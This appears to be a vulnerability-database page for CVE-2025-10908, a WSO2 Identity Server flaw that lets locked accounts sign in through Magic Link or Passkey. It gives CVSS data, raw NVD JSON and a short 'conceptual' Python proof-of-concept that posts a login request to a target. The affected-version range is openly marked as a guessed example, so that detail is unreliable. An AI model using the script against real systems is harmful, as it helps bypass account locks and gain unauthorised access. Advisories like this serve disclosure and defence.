CVE-2025-10908

Description

Due to a lack of user account state validation during authentication, locked user accounts can be successfully authenticated using Magic Link or Pass Key methods. This bypasses the intended security control that should prevent access to accounts that have been locked. This vulnerability may allow unauthorized access to applications and sensitive data associated with accounts that should have been restricted via the account lock mechanism. It also undermines the effectiveness of the account lock mechanism intended to prevent further login attempts.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WSO2 Identity Server 5.11.0 - 5.12.0 (Example range based on typical advisory, verify exact versions)

WSO2 IS as Key Manager 5.11.0 - 5.12.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual PoC for CVE-2025-10908 # Demonstrates authentication bypass for locked accounts via Magic Link import requests target = "https://target-wso2-instance.com/commonauth" locked_user = "[email protected]" # Payload simulating a Magic Link or Passkey login attempt payload = { "username": locked_user, "authType": "magic_link" # or 'passkey' } response = requests.post(target, data=payload) # If the server processes the authentication without checking lock status if response.status_code == 200 and ("magic_link_sent" in response.text or "auth_success" in response.text): print("[+] Exploit Successful: Authentication initiated for locked account.") else: print("[-] Exploit Failed: Account lock enforced.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10908
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10908
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10908/
[4] VulDB https://vuldb.com/cve/CVE-2025-10908
[5] https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4388/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10908", "sourceIdentifier": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "published": "2026-05-11T10:16:12.590", "lastModified": "2026-05-11T20:23:28.213", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to a lack of user account state validation during authentication, locked user accounts can be successfully authenticated using Magic Link or Pass Key methods. This bypasses the intended security control that should prevent access to accounts that have been locked.\n\nThis vulnerability may allow unauthorized access to applications and sensitive data associated with accounts that should have been restricted via the account lock mechanism. It also undermines the effectiveness of the account lock mechanism intended to prevent further login attempts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4388/", "source": "ed10eef1-636d-4fbe-9993-6890dfa878f8"}]}}